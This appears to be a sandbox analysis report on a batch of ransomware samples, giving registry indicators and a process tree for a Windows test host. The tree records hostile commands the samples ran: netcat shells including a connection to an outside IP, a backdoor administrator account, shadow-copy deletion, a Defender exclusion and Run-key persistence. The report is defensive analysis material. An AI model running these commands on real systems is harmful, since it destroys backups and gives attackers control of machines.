Trojan-Ransom.Win32.Blocker.lvzt-9bc75c69ead3c8ae7297911c3603cecc3f3d3c739cd5ebb60b111af1939c6952.exe 124 PID 2504 wrote to memory of 2516 2504 cmd.exe 126 PID 2504 wrote to memory of 2516 2504 cmd.exe 126 PID 2504 wrote to memory of 2516 2504 cmd.exe 126 PID 3596 wrote to memory of 1664 3596 cmd.exe 127 PID 3596 wrote to memory of 1664 3596 cmd.exe 127 PID 3596 wrote to memory of 1664 3596 cmd.exe 127 PID 3428 wrote to memory of 3300 3428 Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe 128 PID 3428 wrote to memory of 3300 3428 Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe 128 PID 3428 wrote to memory of 3300 3428 Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe 128 PID 4972 wrote to memory of 1704 4972 Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe 131 PID 4972 wrote to memory of 1704 4972 Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe 131 PID 4972 wrote to memory of 1704 4972 Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe 131 PID 4972 wrote to memory of 4780 4972 Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe 132 PID 4972 wrote to memory of 4780 4972 Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe 132 PID 4972 wrote to memory of 4780 4972 Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe 132 PID 4972 wrote to memory of 4780 4972 Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe 132 PID 4972 wrote to memory of 4780 4972 Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe 132 PID 2504 wrote to memory of 4444 2504 cmd.exe 134 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\LockTaskbar = "1" Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 3028 attrib.exe 8484 attrib.exe -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵PID:812
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding2⤵PID:4600
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies registry class
PID:2332 -
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\00424\Trojan-Ransom.bmp"3⤵
- Suspicious use of SetWindowsHookEx
PID:1616
-
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3492
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00424.7z"2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:428
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /13⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3064 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\DKHMRCDXTJ-MANUAL.txt4⤵PID:2872
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\RETURN FILES.txt4⤵PID:10120
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\HOW-TO-DECRYPT-jjj9b.txt4⤵PID:7220
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.Blocker.gen-388a6625b398cbfbd4d915b8165b37ebba259fe9ef89a6bbef5ca9677b42ed52.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-388a6625b398cbfbd4d915b8165b37ebba259fe9ef89a6bbef5ca9677b42ed52.exe4⤵
- Executes dropped EXE
PID:1712
-
-
C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.Gen.gen-886ed9d1806668c086ece3c4d433b9daced419d2fc8645d3c5db28a7b7878cd0.exeHEUR-Trojan-Ransom.MSIL.Gen.gen-886ed9d1806668c086ece3c4d433b9daced419d2fc8645d3c5db28a7b7878cd0.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2184
-
-
C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.Makop.gen-0ed05e4be5376f0cf391a78afc7a3114ffbfa064348fb66cd93e8ee6f6b27fe1.exeHEUR-Trojan-Ransom.MSIL.Makop.gen-0ed05e4be5376f0cf391a78afc7a3114ffbfa064348fb66cd93e8ee6f6b27fe1.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exeHEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1088 -
C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe"C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe"5⤵
- Executes dropped EXE
PID:7820
-
-
C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe"C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies system executable filetype association
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5732
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe"'5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:8584
-
-
-
C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.Petr.gen-164a86e099913008bebcd659331c1033c4afd97af2a15cca3a35765bca504be9.exeHEUR-Trojan-Ransom.MSIL.Petr.gen-164a86e099913008bebcd659331c1033c4afd97af2a15cca3a35765bca504be9.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1484
-
-
C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.Thanos.gen-68cfd9eeb25aebc7a65c5c72b8426edc88865ec13732374ba5dda877107bfe6a.exeHEUR-Trojan-Ransom.MSIL.Thanos.gen-68cfd9eeb25aebc7a65c5c72b8426edc88865ec13732374ba5dda877107bfe6a.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1080
-
-
C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.Win32.KlopRansom.gen-ed3dfa9f2452537d378ead320e1506d392d3f91557d8c52714dfd6024176cf73.exeHEUR-Trojan-Ransom.Win32.KlopRansom.gen-ed3dfa9f2452537d378ead320e1506d392d3f91557d8c52714dfd6024176cf73.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2520
-
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exeTrojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe4⤵
- Modifies firewall policy service
- UAC bypass
- Disables RegEdit via registry modification
- Drops file in Drivers directory
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3428 -
C:\Users\Admin\AppData\Local\ncarchive.rar.exe"C:\Users\Admin\AppData\Local\ncarchive.rar.exe" -dC:\Users\Admin\AppData\Local\ -ppassword -s5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3200
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" firewall add allowedprogram C:\Users\Admin\AppData\Local\nc.exe RemoteSupport ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3300
-
-
C:\Users\Admin\AppData\Local\nc.exe"C:\Users\Admin\AppData\Local\nc.exe" -L -p 53 -e cmd.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4740
-
-
C:\Users\Admin\AppData\Local\nc.exe"C:\Users\Admin\AppData\Local\nc.exe" 150.70.162.115 805⤵
- Executes dropped EXE
PID:2976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Net User dmatio dmatio /add5⤵PID:4368
-
C:\Windows\SysWOW64\net.exeNet User dmatio dmatio /add6⤵
- System Location Discovery: System Language Discovery
PID:7544 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 User dmatio dmatio /add7⤵
- System Location Discovery: System Language Discovery
PID:8500
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Net Localgroup Administrators dmatio /add5⤵
- System Location Discovery: System Language Discovery
PID:408 -
C:\Windows\SysWOW64\net.exeNet Localgroup Administrators dmatio /add6⤵
- System Location Discovery: System Language Discovery
PID:8776 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 Localgroup Administrators dmatio /add7⤵
- System Location Discovery: System Language Discovery
PID:5192
-
-
-
-
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exeTrojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe"C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00424\tmp.bat" "6⤵
- System Location Discovery: System Language Discovery
PID:1704 -
C:\Windows\SysWOW64\PING.EXEping -n 1 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2896
-
-
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\system32\svchost.exe"6⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4780 -
C:\Windows\SysWOW64\svchost.exe"C:\Windows\system32\svchost.exe" __OwningControllerProcess 47807⤵
- System Location Discovery: System Language Discovery
PID:2788
-
-
-
-
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Blocker.lvzt-9bc75c69ead3c8ae7297911c3603cecc3f3d3c739cd5ebb60b111af1939c6952.exeTrojan-Ransom.Win32.Blocker.lvzt-9bc75c69ead3c8ae7297911c3603cecc3f3d3c739cd5ebb60b111af1939c6952.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe Trojan-Ransom.bmp5⤵
- System Location Discovery: System Language Discovery
PID:4248
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c airzvp.bat > nul5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v svechosts /t REG_SZ /d C:\Users\Admin\AppData\Roaming\svechosts.exe /f6⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:1664
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC Minute /MO 1 /TR C:\Users\Admin\AppData\Roaming\svechosts.exe /TN svechosts /F6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2812
-
-
-
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Blocker.lyiu-985b67a88f7fc9935704c7c18ecb4a7d077fb02c658a9d3fcfec9439776564d5.exeTrojan-Ransom.Win32.Blocker.lyiu-985b67a88f7fc9935704c7c18ecb4a7d077fb02c658a9d3fcfec9439776564d5.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2516 -
C:\Users\Admin\AppData\Roaming\AdobeART.exe"C:\Users\Admin\AppData\Roaming\AdobeART.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1448
-
-
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Blocker.mvrm-4138c885d1abbe86b0a700b1ff8489932b25c3fb3feaed4bb60f269d80ef22d4.exeTrojan-Ransom.Win32.Blocker.mvrm-4138c885d1abbe86b0a700b1ff8489932b25c3fb3feaed4bb60f269d80ef22d4.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4444 -
C:\Users\Admin\AppData\Local\Temp\hack.exe"C:\Users\Admin\AppData\Local\Temp\hack.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3200 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\key1.bat" "6⤵
- System Location Discovery: System Language Discovery
PID:1332 -
C:\Users\Admin\AppData\Local\Temp\key7.exekey7.exe -p3215295617s -dC:\Users\Admin\AppData\Local\Temp7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1900 -
C:\Users\Admin\AppData\Local\Temp\key6.exe"C:\Users\Admin\AppData\Local\Temp\key6.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6348 -
C:\Users\Admin\AppData\Local\Temp\key6.exe"C:\Users\Admin\AppData\Local\Temp\key6.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:7120 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v winexplorer /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Windows Explorer.exe""10⤵
- System Location Discovery: System Language Discovery
PID:2944 -
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v winexplorer /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Windows Explorer.exe"11⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5176
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Crusis.dqg-79b8c026d2e90a16b4a585f38be231828bc9d52255948d4a7d9248bb25e882d1.exeTrojan-Ransom.Win32.Crusis.dqg-79b8c026d2e90a16b4a585f38be231828bc9d52255948d4a7d9248bb25e882d1.exe4⤵
- Executes dropped EXE
PID:2852 -
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Crusis.dqg-79b8c026d2e90a16b4a585f38be231828bc9d52255948d4a7d9248bb25e882d1.exeC:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Crusis.dqg-79b8c026d2e90a16b4a585f38be231828bc9d52255948d4a7d9248bb25e882d1.exe5⤵PID:9168
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"6⤵PID:5604
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:7776
-
-
C:\Windows\system32\mode.commode con cp select=12517⤵PID:5336
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet7⤵
- Interacts with shadow copies
PID:6236
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"6⤵PID:9552
-
C:\Windows\system32\mode.commode con cp select=12517⤵PID:8216
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet7⤵
- Interacts with shadow copies
PID:8468
-
-
-
-
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exeTrojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:4068 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet5⤵
- System Location Discovery: System Language Discovery
PID:2628
-
-
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exeTrojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe4⤵
- Executes dropped EXE
PID:4020 -
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exeTrojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe5⤵
- Drops file in Drivers directory
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:100
-
-
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.DoppelPaymer.bf-9d2ef7b5f84ee093e0e010add38917032d45008533472c6744c16c072f266f48.exeTrojan-Ransom.Win32.DoppelPaymer.bf-9d2ef7b5f84ee093e0e010add38917032d45008533472c6744c16c072f266f48.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1136 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 4445⤵
- Program crash
PID:5796
-
-
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exeTrojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3920 -
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exeC:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6376 -
C:\Users\Admin\AppData\Roaming\rundll32.exe"rundll32.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5536 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k7⤵PID:2360
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5536 -s 6527⤵
- Program crash
PID:7496
-
-
-
-
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exeTrojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe4⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2860 -
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exeC:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:9180
-
-
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Foreign.olpr-302fecaf77de168224abccd8a610dda5699e0d16ea5fa4577de83fad2f22433a.exeTrojan-Ransom.Win32.Foreign.olpr-302fecaf77de168224abccd8a610dda5699e0d16ea5fa4577de83fad2f22433a.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2432 -
C:\Users\Admin\AppData\Roaming\Microsoft\AVShieldPro.exe"C:\Users\Admin\AppData\Roaming\Microsoft\AVShieldPro.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6044 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe6⤵PID:5152
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe7⤵PID:2984
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5148 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 9368⤵
- Program crash
PID:5696
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 10328⤵
- Program crash
PID:6908
-
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe5⤵PID:3616
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe6⤵PID:4260
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5276 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 9367⤵
- Program crash
PID:5672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 10447⤵
- Program crash
PID:6164
-
-
-
-
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exeTrojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:216 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout -c 5 & del "C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe" /f /q5⤵
- System Location Discovery: System Language Discovery
PID:1712 -
C:\Windows\SysWOW64\timeout.exetimeout -c 56⤵
- Delays execution with timeout.exe
PID:7776
-
-
-
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exeTrojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:2296 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout -c 5 & del "C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe" /f /q5⤵
- System Location Discovery: System Language Discovery
PID:3056 -
C:\Windows\SysWOW64\timeout.exetimeout -c 56⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:7252
-
-
-
-
